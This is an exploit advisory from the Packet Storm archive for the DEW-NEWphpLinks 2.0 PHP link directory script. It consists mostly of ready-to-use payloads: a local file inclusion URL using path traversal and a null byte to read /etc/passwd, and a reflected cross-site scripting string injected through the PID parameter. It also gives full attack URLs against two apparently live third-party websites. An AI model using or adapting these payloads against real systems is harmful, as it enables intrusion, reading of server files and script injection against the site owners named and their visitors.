DEW-NEWphpLinks 2.0 XSS / LFI

2009-04-28T00:00:00
ID PACKETSTORM:77037
Type packetstorm
Reporter d3v1l
Modified 2009-04-28T00:00:00

Description

                                        
                                            `[~]------------------------------------------------------------------------------------------------  
[~] DEW-NEWphpLinks 2.0 (LFI/XSS) Multiple Remote Vulnerabilities  
[~]  
[~] http://www.dew-code.com  
[~]  
[~]  
[~]  
-----------------------------------------------------------------------------------------------  
[~] Bug founded by d3v1l [Avram Marius]  
[~]  
[~] Date: 25.04.2009  
[~]  
[~]  
[~] d3v1l@spoofer.com http://security-sh3ll.com  
[~]  
[~]  
------------------------------------------------------------------------------------------------  
[~] Greetz tO ALL:-  
[~]  
[~] Security-Shell Members(  
https://security-shell.ws/forum.php)-(http://security-sh3ll.blogspot.com)  
[~]  
[~] milw0rm staff  
[~]-------------------------------------------------------------------------------------------------  
[~] Exploit :- LFI - index.php?show=  
[~]  
[~] http://site.com/index.php?show=../../../../../../etc/passwd%00  
[~]  
[~] Ex :-  
[~]  
[~]  
http://www.customprintedsweatshirts.com/links/index.php?show=../../../../../../etc/passwd%00  
[~]  
http://directory.custom-printed-t-shirts.com/index.php?show=../../../../../../etc/passwd%00  
[~]-------------------------------------------------------------------------------------------------  
[~] XSS on search module works fine on ALL version  
[~]  
[~] Ex :- XSS - index.php?PID=  
[~]  
[~] http://directory.custom-printed-t-shirts.com/index.php?PID=  
"><script>alert("test")</script>  
[~] http://www.customprintedsweatshirts.com/links/index.php?PID=  
"><script>alert("test")</script>  
[~]-------------------------------------------------------------------------------------------------  
`